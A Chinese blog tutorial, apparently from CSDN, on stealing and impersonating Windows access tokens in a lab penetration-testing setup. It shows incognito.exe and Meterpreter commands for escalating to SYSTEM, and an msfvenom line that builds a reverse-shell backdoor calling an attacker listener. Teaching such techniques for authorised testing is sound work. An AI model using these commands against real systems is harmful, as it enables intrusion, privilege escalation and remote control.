Windos 内网渗透之Token的使用

最新推荐文章于 2023-12-16 20:02:29 发布
最新推荐文章于 2023-12-16 20:02:29 发布
阅读量700 收藏 3
点赞数
分类专栏: 内网渗透 文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53742230/article/details/126081888
版权
本文详细介绍了Windows系统中AccessToken的概念、类型及其在内网渗透中的重要性。通过incognito工具和MSF框架展示了如何窃取与利用AccessToken,包括模拟不同用户权限、进程令牌窃取及权限降级等操作,强调了此类技术在合法安全测试中的应用边界。
摘要由CSDN通过智能技术生成

文章目录

内网渗透 Token

本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

前言

令牌(token) 是系统的临时秘钥,相当于账号和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。它允许你在不提供密码或其他凭证的前提
下, 访问网络和系统资源,这些令牌将持续存在于系统中,除非系统重新启动。

令牌最大的特点就是随机性不可预测,黑客或软件无法猜测出令牌。

假冒令牌可以假冒一个网络中的另一个用户进行各类操作。

所以当一个攻击者需要域管理员的操作权限时候,需要通过假冒域管理员的令牌进行攻击。

令牌有很多种:

  • 访问令牌(Access Token):表示访问控制操作主体的系统对象
  • 会话令牌(Session Token):是交互会话中唯一的身份标识符
  • 密保令牌(Security Token):又叫做认证令牌或硬件令牌,是一种计算机身份校验的物理设备,例如 U 盾

Windows 的 的 AccessToken 有两种类型:

  • Delegation Token :授权令牌,它支持交互式会话登录 (例如本地用户直接登录、远程桌面登录访问)
  • Impresonation Token :模拟令牌,它是非交互的会话 (例如使用 net use访问共享文件夹)

Tips: 两种 token 只在系统重启后清除 具有 Delegation token 的用户在注销后,该 Token 将变成 Impersonation token ,依旧有效。

AccessToken 的窃取与利用

AccessToken 的窃取与利用需要 administrator 管理员权限,也就是说要提权。

窃取 AccessToken 的方法:

  • incognito.exe 程序

  • InvokeTokenManipulat.ps1 脚本

  • MSF 里的 incognito 模块

incognito

项目下载地址:https://labs.mwrinfosecurity.com/assets/BlogFiles/incognito2.zip

这里我们必须在使用管理员打开cmd要不然有的功能会不完整。

AccessToken 的列举(需要 administrator 权限)
incognito.exe list_tokens -u

操作:模拟其他用户的令牌(复制 token)

如果要使用 AccessToken 模拟其他用户,可以使用命令
incognito.exe execute -c "完整的 Token 名" cmd.exe

例如:模拟 system 权限用户(提权至 system):
incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe

降权至当前用户:
incognito.exe execute -c "当前用户 token" cmd.exe

获取域普通用户
incognito.exe execute -c "moonsec\test" cmd.exe

MSF 下的 incognito

use incognito 								# 加载 incognito
list_tokens -u 								# 列出 AccessToken
getuid 										# 查看当前 token
impersonate_token "NT AUTHORITY\SYSTEM" 	# 模拟 system 用户,getsystem 命令即实现了该命令。如果要模拟其他用户,将 token 名改为其他用户即可
steal_token 1252 							# 从进程窃取 token
getsystem 									# 提升至 system 权限
rev2self	 								# 返回到之前的 AccessToken 权限

msfconsole 令牌实战

# msf 生成后门
msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=6666 LHOST=192.168.150.145 -f exe -o msf.exe

# 监听端口
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.150.145
set lport 6666
exploit


#进入 incognito 模块
use incognito 
# 列出令牌
list_tokens -u

这里列出了两种令牌:

  • Delegation Token:也就是授权令牌,它支持交互式登录(例如可以通过远程桌面登录访问)
  • Impresonation Token:模拟令牌,它是非交互的会话。
伪造令牌
impersonate_token "NT AUTHORITY\SYSTEM" 		# 假冒 System 的令牌
impersonate_token moonsec\\test 				# 假冒 moonsec\test的令牌

进程窃取令牌
# 列出进程
ps
# 窃取进程的令牌
steal_token 2508

这里我们窃取了一个 system 的权限。

返回之前的 token
rev2self

许我写余生ღ
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
token.exe
10-26
token.exe
浅析Windows Access Token以及利用方法
Jinmindong
02-27 960
这种token替换提权的操作无法通过普通用户来操作,最低都是要求要administrator,另可用于服务账户提权到systen,或者本地存在域管的token用来替换域管的tokentoken操作需要操作账户拥有以下权限之一(whoami /priv):以上有问题欢迎各位交流指出。
Windows操作系统----安全机制----Token
一个热爱逆向,喜爱学习、分享的猿。
12-09 4890
简介 Token结构体是访问权限检查中的代表主体身份的核心数据结构,Windows 10 x64平台下的结构见最后。 我们比较关注其中的特权位图和三个代表主体身份的Sid数组:UserAndGroups,RestrictedSids,Capabilities。 进程主令牌和模拟令牌 每一个进程有一个主要的令牌,它描述了与当前进程相关的用户帐户的安全上下文。默认情况下,系统用主令牌当一个进程的线程与一个安全对象相互作用时。此外,一个线程可以模拟一个客户端帐户。模拟允许此线程与安全对象交互时用.
Windows Access Token
purvispanwu的博客
12-04 676
Windows Token
渗透技巧——Token窃取与利用
weixin_30312557的博客
06-06 1027
作者: print("")分类:信息安全发布时间: 2018-06-02 17:21编辑 0x00 前言 在之前的文章《渗透技巧——程序的降权启动》介绍了使用SelectMyParent降权的方法,本质上是通过token窃取实现的。这一次将要对token窃取和利用进一步介绍,测试常用工具,分享利用技巧。 0x01 简介 本文将要介绍以下内容; Token简...
详解JWT token心得与使用实例
10-16
JWT(JSON Web Token)是一种开放的标准(RFC 7519),定义了一种紧凑的、自包含的方式来安全地在各方之间传输信息作为一个 JSON 对象。这个信息可以被验证和信任,因为它是数字签名的。JWT token 在现代 web 应用...
KatalonStudio之接口测试中token处理
01-27
本篇将详细介绍如何在Katalon Studio中处理接口测试中的token处理,特别是获取和使用access_token的过程。 1. **创建API/Web Service项目**: 首先,你需要在Katalon Studio中创建一个新的API/Web Service项目。在...
ASP.NET Core Web API之Token验证
06-26
ASP.NET Core Web API采用Token进行身份验证。 主要技术:ASP.NET Core Web API , JWT , Json web token 包括获取TokenToken验证,生成Token等内容 具体可参考个人文章【ASP.NET Core Web API之Token验证】
vue中的使用token的方法示例
10-15
以下是一个关于Vue中使用Token的详细示例,包括登录、存储Token以及在API请求中使用Token。 1. **登录过程**: 在`login.vue`组件中,当用户提交登录表单时,`handleLogin`方法会被调用。这个方法向服务器发送一个...
windows核心编程-用户权限
qq_22423659的博客
11-27 1043
UAC(User Account Control,用户账户控制)是微软为提高系统安全而在Windows Vista中引入的新技术。要关闭它,进行以下操作 1、win+R,输入Gpedit.msc打开“组策略”。 2、以此定位“计算机配置”--“windows设置”--“安全设置”--“安全选项” 3、在"安全选项"中找到"用户账户控制:管理审批模式下管理员提升提示行为"选项。双击,修
Windows Token Stealing
10-11
Windows Token Stealing
【Metasploit】MSF常用命令
m0_62783065的博客
02-06 1914
【Metasploit】MSF常用命令
一文告诉你:tokenWindow当中是怎么工作的?,升职加薪必看
m0_66264856的博客
01-22 457
// 注意这里添加了主题 val dialog = AlertDialog.Builder(applicationContext,R.style.AppTheme) … } 好了再次运行: 嗯嗯?又崩溃了,原因是:Unable to add window – token null is not valid; is your activity running?token为null?这个token是什么?为什么同样是context,使用activity没问题,用ApplicationContext就出问题了?
内网渗透之凭证提取
EnerY3的博客
12-16 1194
凭证提取通常是渗透测试或攻击中的一项关键步骤,因为一旦攻击者获得了用户的凭证,就可以进一步获取明文密码,从而获得对系统或应用程序的更深入访问权限。
内网渗透Token令牌窃取
qq_44029310的博客
08-05 2520
本文包括:令牌的基本概念和种类,以及在windows靶场环境下访问令牌的窃取利用。
内网渗透
weixin_45808483的博客
02-28 2004
域信息搜集命令 1.查询当前环境 whoami && ipconfig /all 2.查询当前域用户 net user /domain 3.查询域控 net time 4.查询域工作组 net group /domain 5.查询域管理用户 net group "domain admins" /domain 6.查询有几台域控制器 需要域权限 net group "Domain controllers" 7.查找域...
内网渗透--总结
weixin_52374319的博客
05-08 8932
内网渗透–总结 前言 记录一个月来对内网渗透的学习总结,内网渗透提前是我们已经通过各种手段拿到内网中某一台可以通向外网的服务器或主机的权限,然后把此当作跳板,内网渗透的目的是拿到DC域控制器的权限,达到控制整个域环境。 信息收集 内网渗透测试,其本质就是信息收集。信息收集的深度,直接关系到内网渗透测试的成败。当你拿下内网的一台主机后,面对的是一片未知的区域,所以首先要的就是对当前所处的网络环境进行判断。包括以下几点: 对当前机器角色的判断 对当前机器所处的网络环境进行判断 对当前机器所处的网络区域进
令牌窃取原理及利用
p_utao的博客
09-09 1629
原理 令牌是系统的临时密钥,相当于账户名和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的,它允许你在不提供密码或其他凭证的前提下,访问网络和系统资源,这些令牌持续存在系统中,除非系统重新启动。 令牌最大的特点就是随机性,不可预测,一般黑客或软件无法猜测出来,令牌有很多种,比如访问令牌表示访问控制操作主题的系统对象;密保令牌,有叫作认证令牌或者硬件令牌,是一种计算机身份效验的物理设备,会话令牌是交互会话中唯一的身份标识符。 Kerberos协议 ...
内网渗透测试:Windows权限提升思路
qq_45521281的博客
02-21 2257
我的Freebuf:https://www.freebuf.com/author/MrAnonymous 我的博客:https://whoamianony.top/ 文章目录Windows系统内核溢出漏洞提权1. 手动查找系统潜在漏洞2. 自动查找系统潜在漏洞3. 选择漏洞并利用Windows系统错误配置漏洞提权Trusted Service Paths漏洞(可信任服务路径漏洞)系统服务错误权限配置漏洞计划任务与AccessChk使用AccessChk使用自动安装配置文件AlwaysInstallElev.
cesium如何内网不使用token
最新发布
12-26
Cesium 是一个用于构建地球数据可视化应用的开源库。通常情况下,Cesium 要求用户提供有效的 token 才能访问其内网服务。然而,如果需要在不使用 token 的情况下访问内网,可以通过以下几种方法实现: 1. 设置内网访问权限:在内网服务器上设置访问权限,允许特定的 IP 地址或者账户来访问内网服务,从而不需要使用 token。 2. 使用代理服务器:通过设置代理服务器来转发请求,将请求的信息传递到内网服务,从而可以不需要在请求中携带 token。 3. 配置身份验证系统:在内网环境中设置身份验证系统,通过其他方式来验证用户身份,确保只有合法用户可以访问内网服务,从而不需要使用 token。 需要注意的是,在不使用 token 的情况下访问内网服务可能会增加安全风险,因此在采取上述方法之前,应该对内网环境进行充分的安全评估,并采取相应的安全措施来保护内网服务的安全。同时,也应该遵守相关的法律法规和公司政策,确保在不使用 token 的情况下访问内网服务的行为合法和合规。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值